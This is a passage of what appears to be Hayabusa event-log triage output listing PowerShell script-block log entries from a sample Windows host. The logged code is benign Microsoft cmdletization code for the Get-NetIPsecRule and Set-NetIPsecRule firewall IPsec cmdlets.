$__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and 
(@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] 
